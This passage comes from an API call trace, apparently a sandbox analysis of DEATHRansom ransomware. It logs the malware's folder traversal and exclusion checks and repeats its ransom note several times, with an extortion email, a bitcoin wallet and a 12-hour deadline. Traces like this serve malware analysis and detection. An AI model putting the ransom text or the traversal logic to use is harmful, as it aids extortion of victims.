ftCreationTime.dwLowDateTime=0x7df21ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7df21ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7df21ca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x8d1, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0076.667] wnsprintfW (in: pszDest=0x8d10090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\Google Chrome.lnk") returned 45 [0076.667] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a09a40, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x485, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 1 [0076.667] wnsprintfW (in: pszDest=0x8d10090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk") returned 47 [0076.667] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a09a40, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x485, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 0 [0076.667] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.667] wnsprintfW (in: pszDest=0x8d10090, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Public\\Desktop\\read_me.txt") returned 39 [0076.667] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\read_me.txt" (normalized: "c:\\users\\public\\desktop\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x77c [0076.711] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.711] WriteFile (in: hFile=0x77c, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.712] CloseHandle (hObject=0x77c) returned 1 [0076.712] GetProcessHeap () returned 0x4f10000 [0076.712] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d10090 | out: hHeap=0x4f10000) returned 1 [0076.712] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.712] wnsprintfW (in: pszDest=0x8cf0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\desktop.ini") returned 31 [0076.712] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0076.712] wnsprintfW (in: pszDest=0x8cf0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents") returned 29 [0076.712] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0076.712] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0076.712] StrStrW (lpFirst="documents", lpSrch="programdata") returned 0x0 [0076.712] StrStrW (lpFirst="documents", lpSrch="$recycle.bin") returned 0x0 [0076.712] StrStrW (lpFirst="documents", lpSrch="program files") returned 0x0 [0076.712] StrStrW (lpFirst="documents", lpSrch="windows") returned 0x0 [0076.712] StrStrW (lpFirst="documents", lpSrch="all users") returned 0x0 [0076.713] StrStrW (lpFirst="documents", lpSrch="appdata") returned 0x0 [0076.713] GetProcessHeap () returned 0x4f10000 [0076.713] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d10090 [0076.713] lstrcpyW (in: lpString1=0x8d10090, lpString2="\\\\?\\C:\\Users\\Public\\Documents" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents") returned="\\\\?\\C:\\Users\\Public\\Documents" [0076.713] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 125 [0076.713] QueueUserWorkItem (Function=0x40a710, Context=0x8d10090, Flags=0x0) returned 1 [0076.713] GetProcessHeap () returned 0x4f10000 [0076.713] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d20098 [0076.714] wnsprintfW (in: pszDest=0x8d20098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\*") returned 31 [0076.714] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.714] wnsprintfW (in: pszDest=0x8d20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\.") returned 31 [0076.714] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.714] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.714] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.714] wnsprintfW (in: pszDest=0x8d20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\..") returned 32 [0076.714] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.714] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.714] wnsprintfW (in: pszDest=0x8d20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini") returned 41 [0076.714] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0076.714] wnsprintfW (in: pszDest=0x8d20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Music") returned 38 [0076.714] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0076.714] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0076.714] StrStrW (lpFirst="my music", lpSrch="programdata") returned 0x0 [0076.714] StrStrW (lpFirst="my music", lpSrch="$recycle.bin") returned 0x0 [0076.714] StrStrW (lpFirst="my music", lpSrch="program files") returned 0x0 [0076.714] StrStrW (lpFirst="my music", lpSrch="windows") returned 0x0 [0076.715] StrStrW (lpFirst="my music", lpSrch="all users") returned 0x0 [0076.715] StrStrW (lpFirst="my music", lpSrch="appdata") returned 0x0 [0076.715] GetProcessHeap () returned 0x4f10000 [0076.715] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d300a0 [0076.716] lstrcpyW (in: lpString1=0x8d300a0, lpString2="\\\\?\\C:\\Users\\Public\\Documents\\My Music" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Music") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Music" [0076.716] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 126 [0076.716] QueueUserWorkItem (Function=0x40a710, Context=0x8d300a0, Flags=0x0) returned 1 [0076.716] GetProcessHeap () returned 0x4f10000 [0076.716] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d400a8 [0076.716] wnsprintfW (in: pszDest=0x8d400a8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*") returned 40 [0076.717] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x11, ftCreationTime.dwHighDateTime=0x2, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSNBC News.url眕耚眵?\x17ǜӱ眕", cAlternateFileName="廠疙휎᥵?\x17甴?\x17a")) returned 0xffffffff [0076.717] wnsprintfW (in: pszDest=0x8d400a8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\read_me.txt") returned 50 [0076.717] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Music\\read_me.txt" (normalized: "c:\\users\\public\\documents\\my music\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c4 [0076.717] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.717] WriteFile (in: hFile=0x7c4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0076.718] CloseHandle (hObject=0x7c4) returned 1 [0076.718] GetProcessHeap () returned 0x4f10000 [0076.718] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d400a8 | out: hHeap=0x4f10000) returned 1 [0076.718] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0076.718] wnsprintfW (in: pszDest=0x8d20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures") returned 41 [0076.718] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0076.718] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0076.718] StrStrW (lpFirst="my pictures", lpSrch="programdata") returned 0x0 [0076.718] StrStrW (lpFirst="my pictures", lpSrch="$recycle.bin") returned 0x0 [0076.718] StrStrW (lpFirst="my pictures", lpSrch="program files") returned 0x0 [0076.718] StrStrW (lpFirst="my pictures", lpSrch="windows") returned 0x0 [0076.719] StrStrW (lpFirst="my pictures", lpSrch="all users") returned 0x0 [0076.719] StrStrW (lpFirst="my pictures", lpSrch="appdata") returned 0x0 [0076.719] GetProcessHeap () returned 0x4f10000 [0076.719] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d400a8 [0076.719] lstrcpyW (in: lpString1=0x8d400a8, lpString2="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures" [0076.719] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 127 [0076.719] QueueUserWorkItem (Function=0x40a710, Context=0x8d400a8, Flags=0x0) returned 1 [0076.719] GetProcessHeap () returned 0x4f10000 [0076.719] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d500b0 [0076.720] wnsprintfW (in: pszDest=0x8d500b0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*") returned 43 [0076.720] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x11, ftCreationTime.dwHighDateTime=0x2, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSNBC News.url眕耚眵?\x17ǜӱ眕", cAlternateFileName="廠疙휎᥵?\x17甴?\x17a")) returned 0xffffffff [0076.720] wnsprintfW (in: pszDest=0x8d500b0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\read_me.txt") returned 53 [0076.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Pictures\\read_me.txt" (normalized: "c:\\users\\public\\documents\\my pictures\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c4 [0076.720] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.720] WriteFile (in: hFile=0x7c4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0076.721] CloseHandle (hObject=0x7c4) returned 1 [0076.721] GetProcessHeap () returned 0x4f10000 [0076.721] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d500b0 | out: hHeap=0x4f10000) returned 1 [0076.721] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0076.721] wnsprintfW (in: pszDest=0x8d20098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Videos") returned 39 [0076.721] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0076.721] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0076.721] StrStrW (lpFirst="my videos", lpSrch="programdata") returned 0x0 [0076.721] StrStrW (lpFirst="my videos", lpSrch="$recycle.bin") returned 0x0 [0076.721] StrStrW (lpFirst="my videos", lpSrch="program files") returned 0x0 [0076.721] StrStrW (lpFirst="my videos", lpSrch="windows") returned 0x0 [0076.721] StrStrW (lpFirst="my videos", lpSrch="all users") returned 0x0 [0076.722] StrStrW (lpFirst="my videos", lpSrch="appdata") returned 0x0 [0076.722] GetProcessHeap () returned 0x4f10000 [0076.722] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d500b0 [0076.722] lstrcpyW (in: lpString1=0x8d500b0, lpString2="\\\\?\\C:\\Users\\Public\\Documents\\My Videos" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\My Videos") returned="\\\\?\\C:\\Users\\Public\\Documents\\My Videos" [0076.722] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 128 [0076.722] QueueUserWorkItem (Function=0x40a710, Context=0x8d500b0, Flags=0x0) returned 1 [0076.722] GetProcessHeap () returned 0x4f10000 [0076.722] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d600b8 [0076.723] wnsprintfW (in: pszDest=0x8d600b8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*") returned 41 [0076.723] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x11, ftCreationTime.dwHighDateTime=0x2, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="MSNBC News.url眕耚眵?\x17ǜӱ眕", cAlternateFileName="廠疙휎᥵?\x17甴?\x17a")) returned 0xffffffff [0076.723] wnsprintfW (in: pszDest=0x8d600b8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\read_me.txt") returned 51 [0076.723] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\My Videos\\read_me.txt" (normalized: "c:\\users\\public\\documents\\my videos\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c4 [0076.806] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: 